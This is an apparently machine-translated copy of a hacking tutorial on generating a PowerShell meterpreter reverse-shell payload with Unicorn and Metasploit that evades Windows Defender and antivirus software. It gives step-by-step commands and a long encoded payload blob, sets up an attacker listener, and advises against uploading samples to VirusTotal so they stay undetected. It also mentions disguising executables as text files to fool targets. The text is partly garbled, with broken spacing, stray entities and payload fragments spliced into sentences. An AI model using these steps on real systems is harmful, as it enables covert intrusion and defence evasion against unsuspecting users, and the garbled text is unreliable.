قالب وردپرس درنا توس
Home / Tips and Tricks / Creating an Unrecognizable Payload, Part 1 (Bypassing Antivirus Software) «Null Byte :: WonderHowTo

Creating an Unrecognizable Payload, Part 1 (Bypassing Antivirus Software) «Null Byte :: WonderHowTo



Hackers are always looking for zero-day exploits that can successfully bypass the security features of Windows 10. Extensive research has been conducted to create undetectable malware and entire GitHub projects to automate the creation of unrecognizable payloads such as WinPaylods, Veil v3, and TheFatRat.

Using a little social engineering to get a target user to open a malicious file can just put a bit of Unicode into the file name. For example, the following GIF shows an executable Windows (EXE) file disguised as a plain text (TXT) file-even if File Explorer Explanation does not have the option Hide Existing Known File Types.

Make no mistake, the file on the right is an executable and, more importantly, is made by the Windows Operating system recognized as an executable file. When the wrong text file is clicked, it opens a new document with Notepad, the default text editor in Windows 10. After opening Notepad, it automatically executes an embedded PowerShell payload (with unicorn), which is a backdoor for the now compromised one Windows Computer Generates

Unicorn, developed by TrustedSec, is a simple tool designed to support penetration testing with PowerShell downgrade attacks and to inject sophisticated shell code payload directly into memory. The techniques used by Unicorn are based on the work of Matthew Graeber and the founder of TrustedSec David Kennedy .

Step 1: Install Metasploit Framework

Metasploit is a dependency of Unicorn. Before installing Unicorn, I quickly guide readers through a metasploit installation to make sure it is up to date with the GitHub repository.

Kali does an excellent job of maintaining stable versions of Metasploit, but I'll show you how to install the absolute latest version. First, remove older versions of Metasploit that may be preinstalled in Kali.

  apt-get remove metasploit-framework 

Then use cURL to download the Metasploit installer.

  curl https: // raw. githubusercontent.com/rapid7/metasploit-omnibus/master/config/templates/metasploit-framework-wrappers/msfupdate.erb> msfinstall 

Update the newly created msfinstall file permissions to make sure they are in Running Kali

  chmod 755 msfinstall 

Then run the installer script with ./ msfinstall .

  ./ msfinstall off

Add metasploit framework to the repository list..OK
Update the package cache..OK
Search for updates and install ..
Read package lists ... Done
Create dependency structure
Read status information ... Done
The following NEW packages will be installed:
Metasploit Framework
0 updated, 1 reinstalled, 0 removed and 124 not updated.
Need 161 MB of archives.
After this process, 377 MB of additional memory will be used.
Get: 1 http://downloads.metasploit.com/data/releases/metasploit-framework/apt lucid / main amd64 metasploit-framework amd64 4.16.57 + 20180529103642.git.4.6219ce0 ~ 1rapid7-1 [161 MB]
Get: 1 http://downloads.metasploit.com/data/releases/metasploit-framework/apt lucid / main amd64 metasploit-framework amd64 4.16.57 + 20180529103642.git.4.6219ce0 ~ 1rapid7-1 [161 MB]
Achieved 65.7 MB in 11 minutes 39 seconds (93.9 kB / s)
Select the previously unselected metasploit-framework package.
(Reading the database ... 145965 Files and directories are currently installed.)
Preparation for unpacking ... / metasploit-framework_4.16.57 + 20180529103642.git.4.6219ce0 ~ 1rapid7-1_amd64.deb ...
Unpack Metasploit Framework (4.16.57 + 20180529103642.git.4.6219ce0 ~ 1rapid7-1) ...
Set up Metasploit Framework (4.16.57 + 20180529103642.git.4.6219ce0 ~ 1rapid7-1) ...
update-alternatives: Use / opt / metasploit-framework / bin / msfbinscan to provide / usr / bin / msfbinscan (msfbinscan) in automatic mode
update-alternatives: Use / opt / metasploit-framework / bin / msfconsole to mount / usr / bin / msfconsole (msfconsole) in automatic mode
update-alternatives: Use / opt / metasploit-framework / bin / msfd to provide / usr / bin / msfd (msfd) in automatic mode
Update Alternatives: Use / opt / metasploit-framework / bin / msfdb to mount / usr / bin / msfdb (msfdb) in automatic mode
update-alternatives: Use / opt / metasploit-framework / bin / msfelsfscan to provide / usr / bin / msfelscan (msfelscan) in automatic mode
update-alternatives: Use / opt / metasploit-framework / bin / msfmachscan to provide / usr / bin / msfmachscan (msfmachscan) in automatic mode
update-alternatives: Use / opt / metasploit-framework / bin / msfpescan to provide / usr / bin / msfpescan (msfpescan) in automatic mode
Update Alternatives: Use / opt / metasploit-framework / bin / msfrop to mount / usr / bin / msfrop (msfrop) in automatic mode
update-alternatives: Use / opt / metasploit-framework / bin / msfrpc to mount / usr / bin / msfrpc (msfrpc) in automatic mode
update-alternatives: use / opt / metasploit-framework / bin / msfrpcd to provide / usr / bin / msfrpcd (msfpcd) in automatic mode
update-alternatives: Use / opt / metasploit-framework / bin / msfupdate to provide / usr / bin / msfupdate (msfupdate) in automatic mode
update-alternatives: Use / opt / metasploit-framework / bin / msfvenom to provide / usr / bin / msfvenom (msfvenom) in automatic mode
update-alternatives: Use / opt / metasploit-framework / bin / metasploit-aggregator to provide / usr / bin / metasploit-aggregator in automatic mode
Run msfconsole to get started
W: --force-yes is deprecated, use one of the options starting with --allow instead. 

When the installer completes, the / opt directory contains a new metasploit-framework / directory.

Step 2: Install Unicorn

When installing Metasploit, the Unicorn GitHub repository can be cloned with git clone github.com/trustedsec/unicorn.

 git clone https: //github.com/trustedsec/unicorn

Clone into a unicorn ...
remote: counting objects: 340, done.
remote: total 340 (delta 0), reused 0 (delta 0), packet reused 340
Receiving objects: 100% (340/340), 163.94 KiB | 45.00 KiB / s, finished.
Resolution deltas: 100% (215/215), done 

Then use the cd command to switch to the new Unicorn directory.

  cd unicorn / 

To see available Unicorn options For a full description of each attack, see ./unicorn.py –help argument.

  ./unicorn.py --help

-------------------- Magic Unicorn Attack Vector v3.1 ----------------------- - -----

Native x86 powershell injection attacks on any Windows platform.
Written by: Dave Kennedy at TrustedSec (https://www.trustedsec.com)
Twitter: @ TrustedSec, @HackingDave
Credits: Matthew Graeber, Justin Elze, Chris Gates

Happy magic unicorns.

Usage: python unicorn.py payload reverse_ipaddr port 
PS Example: python unicorn.py windows / meterpreter / reverse_https 192.168.1.5 443
PS Down / Exec: Python Unicorn.py windows / download_exec URL = http: //badurl.com/payload.exe
Macro example: python unicorn.py windows / meterpreter / reverse_https 192.168.1.5 443 macro
Macro Example CS: python unicorn.py  CS macro
Macro example shellcode: python unicorn.py  shellcode macro
HTA example: python unicorn.py windows / meterpreter / reverse_https 192.168.1.5 443 hta
HTA Example CS: python unicorn.py  cs hta
HTA shellcode example: python unicorn.py : shellcode hta
DDE Example: python unicorn.py windows / meterpreter / reverse_https 192.168.1.5 443 dde
CRT Example: python unicorn.py  crt
Custom PS1 example: python unicorn.py 
Custom PS1 example: python unicorn.py  macro 500
Cobalt Strike Example: python unicorn.py  cs (Export CS in C # format)
Custom shellcode: python unicorn.py  shellcode (formatted 0x00)
Help menu: python unicorn.py --help 

There are some interesting and effective unicorn options. In this article, I'll focus on the PowerShell and Meterpreter solution.

Step 3: Generating the payload

Use the following command to create a payload with Unicorn:

  ./ Unicorn. py windows / meterpreter / reverse_https   

Unicorn uses the Metasploit reverse_https module to connect to the IP address of the attacker via the specified port.

  [*] Generate the payload shell code. This may take a few seconds / minutes while we create the shellcode ...

, /
//
, //
___ / | | //
`__ /  _ - (/ | ___ / - /
 |  _-  ___ __-_ `- / - / .
|  _-___, -  _____-- / _) & # 39; 
 -_ / __  (`(__`  |
` __ | | ) / (/ |
, ._____., & # 39; - // - |  | "/
/ __. , / /, --- |  /
/ / _.   & # 39; / `_ / _, & # 39; | |
| | (( |, /  & # 39; __ / & # 39; / | |
|   `-,` _ / _ ------ ______ /  () /
| |   _. ,  ___ / 
| |  _   
   _   / 
   ._  __  _ | | 
  ___   | 
 __  __   _ |  |
|  _____  ____ | |
|   __ --- & # 39; .__  | | |
  __ --- /) |  /
  ____ / / () ( & # 39; ---_ / |
 __________ / (, --__  _________. | ./ |
|   & # 39; ---_  -,   _,. / |
|   _ ` /` ---_______- \ /
  .___, `| /  
 |  _  |  (|: |
   | / / | | ;
    (`_ & # 39;  |
.  .  & # 39; __ / | |
  .  | |
    ()
 |  | | |
| \  Me`
(__; (_; (& # 39; -_ & # 39 ;;
| ___   ___:  ___:

aHR0cHM6Ly93d3cuYmlYXJ5ZGVmZW5zZS5jb20vd3AtY29udGVudC91cGxvYWRzLzIwMTcvMDUvS2VlcE1hdHRIYXBweS5qcGc =

Written by: Dave Kennedy at TrustedSec (https://www.trustedsec.com)
Twitter: @ TrustedSec, @HackingDave

Happy magic unicorns.

[********************************************************************************************************]

----- POWERSHELL ATTACK INSTRUCTIONS ----

Everything is now created in two files, powershell_attack.txt and unicorn.rc. The text file contains all the code needed to inject the Powershell attack into memory. Note that you need a location that supports remote command injections in some way. Often this could be due to an Excel / Word document or through psexec_commands within Metasploit, SQLi, etc. There are so many implications and scenarios where you can use this attack. Simply insert the powershell_attack.txt command into any command prompt window, or you can invoke the Powershell executable file and get a shell back. This attack also supports Windows / download_exec for a payload method instead of meterpreter payloads. If you are using the download and the exec, just put python unicorn.py windows / download_exec url = https: //www.thisisnotarealsite.com/payload.exe and the Powershell code will download and run the payload.

Note that you must enable a listener to detect the attack.

[*******************************************************************************************************]
	
[*]   Powershell output code exported to powershell_attack.txt.
[*] Exported Metasploit RC file as unicorn.rc. Run msfconsole -r unicorn.rc to run and create listeners. 

When Unicorn has generated the payload, two new files are created. The first is powershell_attack.txt which can be viewed with the command catpowershell_attack.txt . This displays the PowerShell code that runs on the Windows 10 target computer and connects to the meterreader.

  cat powershell_attack.txt

powershell / w 1 / C "s # 39; v Mx -; s # 39; v CV e # 39; s # 39; (g & # 39; v Mx) .value.toString () + (g & # 39; v CV) .value.toString ()); powershell (g & # 39; v nU) .value.toString () (& # 39; JAB GEAdABpAG AGMAMAAsADAAeAA2ADQALAAwAHgAOABiACwAMAB4ADUAMAAsADAAeAAzADAALAAwAHgAOABiACwAMAB4ADUAMgAsADAAeAAwAGMALAAwAHgAOABiACwAMAB4ADUAMgAsADAAeAAxADQALAAwAHgAOABiACwAMAB4ADcAMgAsADAAeAAyADgALAAwAHgAMABmACwAMAB4AGIANwAsADAAeAA0AGEALAAwA HgAMgA2ACwAMAB4ADMAMQAsADAAeABmAGYALAAwAHgAYQBjACwAMAB4ADMAYwAsADAAeAA2ADEALAAwAHgANwBjACwAMAB4ADAAMgAsADAAeAAyAGMALAAwAHgAMgAwACwAMAB4AGMAMQAsADAAeABjAGYALAAwAHgAMABkACwAMAB4ADAAMQAsADAAeABjADcALAAwAHgAZQAyACwAMAB4AGYAMgAsADAAeAA1ADIALAAwAHgANQA3ACwAMAB4ADgAYgAsADAAeAA1ADIALAAwAHgAMQAwACwAMAB4ADgAYgAsADAAeAA0AGEALAAwAHgAMwBjACwAMAB4ADgAYgAsADAAeAA0AGMALAAwAHgAMQAxACwAMAB4ADcAOAAsADAAeABlADMALAAwAHgANAA4ACwAMAB4ADAAMQAsADAAeABkADEALAAwAHgANQAxACwAMAB4ADgAYgAsADAAeAA1ADkALAAwAHgAMgAwACwAMAB4ADAAMQAsADAAeABkADMALAAwAHgAOABiACwAMAB4ADQAOQAsADAAeAAxADgALAAwAHgAZQAzACwAMAB4ADMAYQAsADAAeAA0ADkALAAwAHgAOABiACwAMAB4ADMANAAsADAAeAA4AGIALAAwAHgAMAAxACwAMAB4AGQANgAsADAAeAAzADEALAAwAHgAZgBmACwAMAB4AGEAYwAsADAAeABjADEALAAwAHgAYwBmACwAMAB4ADAAZAAsADAAeAAwADEALAAwAHgAYwA3ACwAMAB 4ADMAOAAsADAAeABlADAALAAwAHgANwA1ACwAMAB4AGYANgAsADAAeAAwADMALAAwAHgANwBkACwAMAB4AGYAOAAsADAAeAAzAGIALAAwAHgANwBkACwAMAB4ADIANAAsADAAeAA3ADUALAAwAHgAZQA0ACwAMAB4ADUAOAAsADAAeAA4AGIALAAwAHgANQA4ACwAMAB4ADIANAAsADAAeAAwADEALAAwA HgAZAAzACwAMAB4ADYANgAsADAAeAA4AGIALAAwAHgAMABjACwAMAB4ADQAYgAsADAAeAA4AGIALAAwAHgANQA4ACwAMAB4ADEAYwAsADAAeAAwADEALAAwAHgAZAAzACwAMAB4ADgAYgAsADAAeAAwADQALAAwAHgAOABiACwAMAB4ADAAMQAsADAAeABkADAALAAwAHgAOAA5ACwAMAB4ADQANAAsADAAeAAyADQALAAwAHgAMgA0ACwAMAB4ADUAYgAsADAAeAA1AGIALAAwAHgANgAxACwAMAB4ADUAOQAsADAAeAA1AGEALAAwAHgANQAxACwAMAB4AGYAZgAsADAAeABlADAALAAwAHgANQBmACwAMAB4ADUAZgAsADAAeAA1AGEALAAwAHgAOABiACwAMAB4ADEAMgAsADAAeABlAGIALAAwAHgAOABkACwAMAB4ADUAZAAsADAAeAA2ADgALAAwAHgANgBlACwAMAB4ADYANQAsADAAeAA3ADQALAAwAHgAMAAwACwAMAB4ADYAOAAsADAAeAA3ADcALAAwAHgANgA5ACwAMAB4ADYAZQAsADAAeAA2ADkALAAwAHgANQA0ACwAMAB4ADYAOAAsADAAeAA0AGMALAAwAHgANwA3ACwAMAB4ADIANgAsADAAeAAwADcALAAwAHgAZgBmACwAMAB4AGQANQAsADAAeAAzADEALAAwAHgAZABiACwAMAB4ADUAMwAsADAAeAA1ADMALAAwAHgANQAzACwAMA B4ADUAMwAsADAAeAA1ADMALAAwAHgANgA4ACwAMAB4ADMAYQAsADAAeAA1ADYALAAwAHgANwA5ACwAMAB4AGEANwAsADAAeABmAGYALAAwAHgAZAA1ACwAMAB4ADUAMwAsADAAeAA1ADMALAAwAHgANgBhACwAMAB4ADAAMwAsADAAeAA1ADMALAAwAHgANQAzACwAMAB4ADYAOAAsADAAeABiAGIALAAwA HgAMAAxACwAMAB4ADAAMAAsADAAeAAwADAALAAwAHgAZQA4ACwAMAB4AGIAMAAsADAAeAAwADAALAAwAHgAMAAwACwAMAB4ADAAMAAsADAAeAAyAGYALAAwAHgAMwA2ACwAMAB4ADMANAAsADAAeAA1ADIALAAwAHgANgAxACwAMAB4ADcAMgAsADAAeAAzADQALAAwAHgANQA3ACwAMAB4ADQAMgAsADAAeAA3ADkALAAwAHgANQAwACwAMAB4ADcANAAsADAAeAA3ADYALAAwAHgAMwAwACwAMAB4ADUANwAsADAAeAAzADcALAAwAHgANQAxACwAMAB4ADQAZQAsADAAeAA0AGUALAAwAHgAMwA0ACwAMAB4ADUANQAsADAAeAA0ADYALAAwAHgANQAxACwAMAB4ADMAMgAsADAAeAA1ADUALAAwAHgANQAxACwAMAB4ADcAMQAsADAAeAA3ADIALAAwAHgANwA5ACwAMAB4ADQAZQAsADAAeAAwADAALAAwAHgANQAwACwAMAB4ADYAOAAsADAAeAA1ADcALAAwAHgAOAA5ACwAMAB4ADkAZgAsADAAeABjADYALAAwAHgAZgBmACwAMAB4AGQANQAsADAAeAA4ADkALAAwAHgAYwA2ACwAMAB4ADUAMwAsADAAeAA2ADgALAAwAHgAMAAwACwAMAB4ADMA & # 39; + # 39; MgAsADAAeABlADAALAAwAHgAOAA0ACwAMAB4ADUAMwAsADAAeAA1ADMALAAwAHgANQAzACwAMAB4ADUANwAsADAAeAA1ADMALAAwAHgANQA2ACwAMAB4ADYAOAAsADAAeABlAGIALAAwAHgANQA1ACwAMAB4ADIAZQAsADAAeAAzAGIALAAwAHgAZgBmACwAMAB4AGQANQAsADAAeAA5ADYALAAwAHgANgBhACwAMAB4ADAAYQAsADAAeAA1AGYALAAwAHgANgA4ACwAMAB4ADgAMAAsADAAeAAzADMALA AwAHgAMAAwACwAMAB4ADAAMAAsADAAeAA4ADkALAAwAHgAZQAwACwAMAB4ADYAYQAsADAAeAAwADQALAAwAHgANQAwACwAMAB4ADYAYQAsADAAeAAxAGYALAAwAHgANQA2ACwAMAB4ADYAOAAsADAAeAA3ADUALAAwAHgANAA2ACwAMAB4ADkAZQAsADAAeAA4ADYALAAwAHgAZgBmACwAMAB4AGQANQAsADAAeAA1ADMALAAwAHgANQAzACwAMAB4ADUAMwAsADAAeAA1ADMALAAwAHgANQA2ACwAMAB4ADYAOAAsADAAeAAyAGQALAAwAHgAMAA2ACwAMAB4ADEAOAAsADAAeAA3AGIALAAwAHgAZgBmACwAMAB4AGQANQAsADAAeAA4ADUALAAwAHgAYwAwACwAMAB4ADcANQAsADAAeAAxADYALAAwAHgANgA4ACwAMAB4ADgAOAAsADAAeAAxADMALAAwAHgAMAAwACwAMAB4ADAAMAAsADAAeAA2ADgALAAwAHgANAA0ACwAMAB4AGYAMAAsADAAeAAzADUALAAwAHgAZQAwACwAMAB4AGYAZgAsADAAeABkADUALAAwAHgANABmACwAMAB4ADcANQAsADAAeABjAGQALAAwAHgANgA4ACwAMAB4AGYAMAAsADAAeABiADUALAAwAHgAYQAyACwAMAB4ADU ANgAsADAAeABmAGYALAAwAHgAZAA1ACwAMAB4ADYAYQAsADAAeAA0ADAALAAwAHgANgA4ACwAMAB4ADAAMAAsADAAeAAxADAALAAwAHgAMAAwACwAMAB4ADAAMAAsADAAeAA2ADgALAAwAHgAMAAwACwAMAB4ADAAMAAsADAAeAA0ADAALAAwAHgAMAAwACwAMAB4ADUAMwAsADAAeAA2ADgALAAwAHgANQA4ACwAMAB4AGEANAAsADAAeAA1ADMALAAwAHgAZQA1ACwAMAB4AGYAZgAsADAAeABkADUALA AwAHgAOQAzACwAMAB4ADUAMwAsADAAeAA1ADMALAAwAHgAOAA5ACwAMAB4AGUANwAsADAAeAA1ADcALAAwAHgANgA4ACwAMAB4ADAAMAAsADAAeAAyADAALAAwAHgAMAAwACwAMAB4ADAAMAAsADAAeAA1ADMALAAwAHgANQA2ACwAMAB4ADYAOAAsADAAeAAxADIALAAwAHgAOQA2ACwAMAB4ADgAOQAsADAAeABlADIALAAwAHgAZgBmACwAMAB4AGQANQAsADAAeAA4ADUALAAwAHgAYwAwACwAMAB4ADcANAAsADAAeABjAGQALAAwAHgAOABiACwAMAB4ADAANwAsADAAeAAwADEALAAwAHgAYwAzACwAMAB4ADgANQAsADAAeABjADAALAAwAHgANwA1ACwAMAB4AGUANQAsADAAeAA1ADgALAAwAHgAYwAzACwAMAB4ADUAZgAsADAAeABlADgALAAwAHgANgA5ACwAMAB4AGYAZgAsADAAeABmAGYALAAwAHgAZgBmACwAMAB4ADMAMQAsADAAeAAzADkALAAwAHgAMwAyACwAMAB4ADIAZQAsADAAeAAzADEALAAwAHgAMwA2ACwAMAB4ADMAOAAsADAAeAAyAGUALAAwAHgAMwAxACwAMAB4ADIAZQAsADAAeAAzADUALAAwAHgAMAAwADsAJABxAF YAIAA9ACAAMAB4ADEAMAAwADcAOwBpAGYAIAAoACQAdABUAC4ATABlAG4AZwB0AGgAIAAtAGcAdAAgADAAeAAxADAAMAA3ACkAewAkAHEAVgAgAD0AIAAkAHQAVAAuAEwAZQBuAGcAdABoAH0AOwAkAHEAZQA9ACQAWABkADoAOgBWAGkAcgB0AHUAYQBsAEEAbABsAG8AYwAoADAALAAwAHgAMQAwADAANwAsACQAcQBWACwAMAB4ADQAMAApADsAZgBvAHIAIAAoACQAWABEAD0AMAA7ACQAWABEACAALQ BsAGUAIAAoACQAdABUAC4ATABlAG4AZwB0AGgALQAxACkAOwAkAFgARAArACsAKQAgAHsAJABYAGQAOgA6AG0AZQBtAHMAZQB0ACgAWwBJAG4AdABQAHQAcgBdACgAJABxAGUALgBUAG8ASQBuAHQAMwAyACgAKQArACQAWABEACkALAAgACQAdABUAFsAJABYAEQAXQAsACAAMQApAH0AOwAkAFgAZAA6ADoAQwByAGUAYQB0AGUAVABoAHIAZQBhAGQAKAAwACwAMAAsACQAcQBlACwAMAAsADAALAAwACkAOwBmAG8AcgAgACgAOwApAHsAUwB0AGEAcgB0AC0AUwBsAGUAZQBwACAANgAwAH0AOwAnADsAJABFAGQAIAA9ACAAWwBTAHkAcwB0AGUAbQAuAEMAbwBuAHYAZQByAHQAXQA6ADoAVABvAEIAYQBzAGUANgA0AFMAdAByAGkAbgBnACgAWwBTAHkAcwB0AGUAbQAuAFQAZQB4AHQALgBFAG4AYwBvAGQAaQBuAGcAXQA6ADoAVQBuAGkAYwBvAGQAZQAuAEcAZQB0AEIAeQB0AGUAcwAoACQAdABUAFYAKQApADsAJABCAHYAIAA9ACAAIgAtAGUAYwAgACIAOwBpAGYAKABbAEkAbgB0AFAAdAByAF0AOgA6AFMAaQB6AGUAIAAtAGUAcQAgA is) 

The other file that was created by Unicorn, unicorn.rc is a resource file that contains the setup and configuration of msfconsole automate [19659006;DgAKQB7ACQAcABMACAAPQAgACQAZQBuAHYAOgBTAHkAcwB0AGUAbQBSAG8AbwB0ACAAKwAgACIAXABzAHkAcwB3AG8AdwA2ADQAXABXAGkAbgBkAG8AdwBzAFAAbwB3AGUAcgBTAGgAZQBsAGwAXAB2ADEALgAwAFwAcABvAHcAZQByAHMAaABlAGwAbAAiADsAaQBlAHgAIAAiACYAIAAkAHAATAAgACQAQgB2ACAAJABFAGQAIgB9AGUAbABzAGUAewA7AGkAZQB4ACAAIgAmACAAcABvAHcAZQByAHMAaABlAGwAbAAgACQAQgB2ACAAAgAgAAgA7AH0A&#39] Step 4: Start Msfconsole with the resource file

To start Metasploit, execute the command msfconsole -r /opt/unicorn/unicorn.rc

  msfconsole -r / opt / unicorn / unicorn.rc

= [ metasploit v4.16.59-dev-                        ]
+ - - = [ 1769 exploits - 1008 auxiliary - 307 post       ]
+ - - = [ 537 payloads - 41 encoders - 10 nops            ]
+ - - = [ Free Metasploit Pro trial: http://r-7.co/trymsp ]

[*]   Processing /opt/unicorn/unicorn.rc for ERB policy.
Resource (/opt/unicorn/unicorn.rc)> Use Multi / Handler
Resource (/opt/unicorn/unicorn.rc)> Set payload window / meterpreter / reverse_https
Payload => Windows / Meterpreter / Reverse_https
Resource (/opt/unicorn/unicorn.rc)> set LHOST 192.168.1.5
LHOST => 192.168.1.5
Resource (/opt/unicorn/unicorn.rc)> Set LPORT 443
LPORT => 443
Resource (/opt/unicorn/unicorn.rc)> set ExitOnSession false
ExitOnSession => false
resource (/opt/unicorn/unicorn.rc)> Set EnableStageEncoding to true
EnableStageEncoding => true
Resource (/opt/unicorn/unicorn.rc)> Exploit -j
[*] Exploit is running as a background job 0.

[-] Handler could not bind to 192.168.1.5:443
msf exploit (multi / handler)> [*] Launched HTTPS reverse handler on https://0.0.0.0:443

The resource file automatically activates the handler ( multi / handler ), set the utility type ( windows / meterpreter / reverse_https ), set the IP address of the attacker ( LHOST ), set the port number ( LPORT ), activate the Stager encoding ( EnableStageEncoding ), and start the msfconsole listener ( exploit -j ) – easy.

At this point everything is set up on the side of the attacker and ready for incoming connections. Now all that matters is to verify that the payload is working and effectively bypassing Windows Defender and antivirus software.

Step 5: Testing the Payload (Do not Upload to VirusTotal)

In my tests, Unicorn's PowerShell payload bypassed Google Chrome, Windows Defender, and Avast antivirus detections in a fully patched Windows 10 Enterprise computer ,

Many projects warn penetration testers against the dangers of using online virus scanners like VirusTotal. In the case of TheFatRat, the developer expressly warns against using VirusTotal each time the program is started.

As someone who regularly experimented with many antivirus bypass software, I understand the temptation to know if the created payload is detecting will bypass the most popular antivirus software technologies. However, uploading to online virus scanners is extremely harmful to these projects. VirusTotal splits the payloads with third-party vendors, dramatically increasing overall recognition rates in a short time.

As an alternative to online scanners, I encourage Pentester to simulate the operating system environment of their destination with virtual machines. For example, if it detects that a target on the local network is using Windows 10 with AVG or Avast, create a Windows 10 VM, install the latest antivirus software in the VM, and test the payload in the VM. This provides the Pentester with the assurance that a payload is working properly and prevents VirusTotal from analyzing the malicious file and sharing its results with other companies.

Continue to Payload …

That's for installing Metasploit, creating the PowerShell payload with Unicorn and automating the boot process of msfconsole Unicorn is a great tool that allows you to create advanced PowerShell payloads difficult to bypass the common antivirus software. In my follow-up article, I show how to turn the PowerShell code into an executable file and do some tricks to make the executable appear as a plain text file.

Cover Picture by Justin Meyers / Null Bytes; Screenshots of tokyoneon / zero byte




Source link